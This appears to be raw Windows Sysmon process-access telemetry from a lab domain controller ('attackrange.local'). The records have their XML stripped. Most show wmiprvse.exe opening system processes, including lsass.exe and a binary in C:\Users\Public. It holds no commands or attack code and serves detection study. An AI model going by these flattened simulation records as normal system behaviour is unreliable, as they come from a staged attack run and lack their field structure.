15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.053{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.053{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 